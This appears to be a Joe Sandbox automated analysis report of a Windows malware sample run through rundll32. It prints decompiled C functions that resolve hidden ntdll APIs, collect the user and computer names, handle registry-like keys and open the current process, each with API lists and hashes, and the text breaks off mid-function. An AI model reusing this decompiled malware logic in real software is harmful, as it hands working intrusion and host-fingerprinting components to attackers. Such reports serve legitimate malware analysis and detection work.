                                          • Opcode Fuzzy Hash: 4c5555779accdf4c2e574dfaffda8452e7de40f28729263e6d16de95050de155
                                          • Instruction Fuzzy Hash: 6E416235900609AFDB01DFFCD84469FB7BAEF49304F158425E914EB160DA72EE46CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04C057D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E04C058BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t1 = _t23 + 0x4c0e11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t2 = _t26 + 0x4c0e769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E04C0147E(_t54);
                                          					} else {
                                          						_t30 =  *0x4c0d2a4; // 0x97a5a8
                                          						_t5 = _t30 + 0x4c0e756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x4c0d2a4; // 0x97a5a8
                                          							_t7 = _t33 + 0x4c0e40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x4c0d2a4; // 0x97a5a8
                                          								_t9 = _t36 + 0x4c0e4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x4c0d2a4; // 0x97a5a8
                                          									_t11 = _t39 + 0x4c0e779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E04C07B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}



















                                          APIs
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C014AF,?,?,?,?,00000000,00000000), ref: 04C057FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C0581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C05835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C0584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C05861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C05877
                                            • Part of subcall function 04C07B01: memset.NTDLL ref: 04C07B80
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 145528d0999a38d40e850c8e1dd27778c73c7a17d49fc35dd1fe169382b79b9e
                                          • Instruction ID: f7814b2640a7ba99708b471c42dcea838c95ced0d3cc15ddd66088b3d746f9ac
                                          • Opcode Fuzzy Hash: 145528d0999a38d40e850c8e1dd27778c73c7a17d49fc35dd1fe169382b79b9e
                                          • Instruction Fuzzy Hash: 492161B4640306AFFB20EFA9C844D5677FDEF443047068965E909DB251EB74EA40CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E04C0A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0x4c0d33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E04C0A5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E04C0621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E04C0147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t16 = _t65 + 0x4c0e8de; // 0x65696c43
                                          					_t68 = E04C0A5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d04c0c0
                                          						if(E04C04C9A( *_t33, _t96, _a8,  *0x4c0d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0x4c0d2a4; // 0x97a5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0x4c0ea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0x4c0ea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E04C030FC( &_a24, _t73,  *0x4c0d334,  *0x4c0d338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0x4c0d2a4; // 0x97a5a8
                                          									_t44 = _t75 + 0x4c0e856; // 0x74666f53
                                          									_t78 = E04C0A5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d04c0c0
                                          										E04C01BC1( *_t47, _t96, _a8,  *0x4c0d338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d04c0c0
                                          										E04C01BC1( *_t49, _t96, _t103,  *0x4c0d330, _a16);
                                          										E04C0147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d04c0c0
                                          									E04C01BC1( *_t40, _t96, _a8,  *0x4c0d338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d04c0c0
                                          									E04C01BC1( *_t43, _t96, _a8,  *0x4c0d330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E04C0147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d04c0c0
                                          					if(E04C074B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d04c0c0
                                          							E04C04C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E04C0147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E04C0147E(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0x4c0d33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}

                                          APIs
                                          • StrChrA.SHLWAPI(04C0553C,0000005F,00000000,00000000,00000104), ref: 04C0A675
                                          • memcpy.NTDLL(?,04C0553C,?), ref: 04C0A68E
                                          • lstrcpy.KERNEL32(?), ref: 04C0A6A4
                                            • Part of subcall function 04C0A5E9: lstrlen.KERNEL32(?,00000000,04C0D330,00000001,04C0937A,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?), ref: 04C0A5F2
                                            • Part of subcall function 04C0A5E9: mbstowcs.NTDLL ref: 04C0A619
                                            • Part of subcall function 04C0A5E9: memset.NTDLL ref: 04C0A62B
                                            • Part of subcall function 04C01BC1: lstrlenW.KERNEL32(04C0553C,?,?,04C0A818,3D04C0C0,80000002,04C0553C,04C09642,74666F53,4D4C4B48,04C09642,?,3D04C0C0,80000002,04C0553C,?), ref: 04C01BE1
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04C0A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: cc645efaf52be1ff2f9370c32edbd5089b300107926b79d592698b5a204afe64
                                          • Instruction ID: 6f08aeb127441ca17a1492647bb2ae8a8cf4345313396adef90bba1aefafd7bb
                                          • Opcode Fuzzy Hash: cc645efaf52be1ff2f9370c32edbd5089b300107926b79d592698b5a204afe64
                                          • Instruction Fuzzy Hash: AD515C7650020AEFEF21AFA4DD40E9A7BBAFF14304F05C614FA15961A0E736EE55EB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04C0614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E04C058BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E04C0147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0x4c05210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,04C0520E), ref: 04C0615E
                                          • GetComputerNameW.KERNEL32(00000000,04C0520E), ref: 04C0617A
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetUserNameW.ADVAPI32(00000000,04C0520E), ref: 04C061B4
                                          • GetComputerNameW.KERNEL32(04C0520E,?), ref: 04C061D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04C0520E,00000000,04C05210,00000000,00000000,?,?,04C0520E), ref: 04C061FA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 8c6aae520dd94136bde4154f97919354819a08bfdf9d90ad6a44d952e2b432b8
                                          • Instruction ID: 91aa6ac5ea653960391f23f4833221e5096a810506afc9f2412625866d8126dc
                                          • Opcode Fuzzy Hash: 8c6aae520dd94136bde4154f97919354819a08bfdf9d90ad6a44d952e2b432b8
                                          • Instruction Fuzzy Hash: FD21EAB6A40208FFDB11DFE5D984DEEBBBDEF54304B1084AAE501E7241E634AB54DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04C062CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0x4c0d114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0x4c0d238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04C06301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C0632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04C06341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04C06350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04C0636B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 3b609d4b63ba5fed0b85635ae632b00bd708633b71befef8b2ae20c08e9e7418
                                          • Instruction ID: f23f5fbabeb80863f8b11ae830607fa7f3ac514c45a756797fdd3d4d0a97994a
                                          • Opcode Fuzzy Hash: 3b609d4b63ba5fed0b85635ae632b00bd708633b71befef8b2ae20c08e9e7418
                                          • Instruction Fuzzy Hash: DA218E7AA00209AFDB019FA8C844BDEBF7AEF85304F058154ED44AB344C735EA65CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04C09FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E04C06B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E04C0A96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0x4c0d12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}








                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04C066AF,?,?,00000000,00000000), ref: 04C0A021
                                          • ResetEvent.KERNEL32(?), ref: 04C0A026
                                          • GetLastError.KERNEL32 ref: 04C0A03E
                                          • GetLastError.KERNEL32(?,?,00000102,04C066AF,?,?,00000000,00000000), ref: 04C0A059
                                            • Part of subcall function 04C06B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?,?,00000000), ref: 04C06B7A
                                            • Part of subcall function 04C06B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?), ref: 04C06BD8
                                            • Part of subcall function 04C06B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04C06BE8
                                          • SetEvent.KERNEL32(?), ref: 04C0A04C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 2d1eeabddf731363bf617a48b0cfeb4765905a661ef13df0d569514976a1b7ca
                                          • Instruction ID: 61b4f86d9eb36f9e40af60989e27d9f27b22191fc4abf6368414ecfbbc8387ea
                                          • Opcode Fuzzy Hash: 2d1eeabddf731363bf617a48b0cfeb4765905a661ef13df0d569514976a1b7ca
                                          • Instruction Fuzzy Hash: 1F016D35200304ABEB306E71DC44F5BB7AAFF54768F11CB24F652910E0D726F855EA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04C06A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x4c0d26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x4c0d25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x4c0d258 = _t6;
                                          					 *0x4c0d264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x4c0d254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x4c0d254 =  *0x4c0d254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}










                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04C090D2,?), ref: 04C06A87
                                          • GetVersion.KERNEL32 ref: 04C06A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04C06AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04C06ACF
                                          • GetLastError.KERNEL32 ref: 04C06AEE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: d116a86dabf6b0123f6e91f5bfcb831153df524c11684fe1e5744b41831f4f9e
                                          • Instruction ID: bc6dd50009ae4a34a640470c9b25c4091e8f692e16741bfef5ef3b7ec2ce5ee1
                                          • Opcode Fuzzy Hash: d116a86dabf6b0123f6e91f5bfcb831153df524c11684fe1e5744b41831f4f9e
                                          • Instruction Fuzzy Hash: 59F0AF78750302DBE724AFA5A809B263BA2E744705F02C22AE543C61C0E778ECE1CF25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 04C0A09B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C0A180
                                            • Part of subcall function 04C091B5: SysAllocString.OLEAUT32(04C0C298), ref: 04C09205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04C0A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C0A1E2
                                            • Part of subcall function 04C0A872: Sleep.KERNEL32(000001F4), ref: 04C0A8BA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          • Opcode ID: 2ffaccc79777ff6eb79734099ef28aba6682f64f0937adf1b03ae311dfd8cb54
                                          • Instruction ID: 5fcd3c1dea173e3427d27f10835096ea0aaf39955b83a9af73c320ba23a23f9e
                                          • Opcode Fuzzy Hash: 2ffaccc79777ff6eb79734099ef28aba6682f64f0937adf1b03ae311dfd8cb54
                                          • Instruction Fuzzy Hash: 62515039500709EFDB01DFA8D844A9EB7B6FF98740F158829E505EB260EB35EE46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E04C091B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t5 = _t103 + 0x4c0e038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x4c0c298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x4c0d2a4; // 0x97a5a8
                                          												_t28 = _t109 + 0x4c0e0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
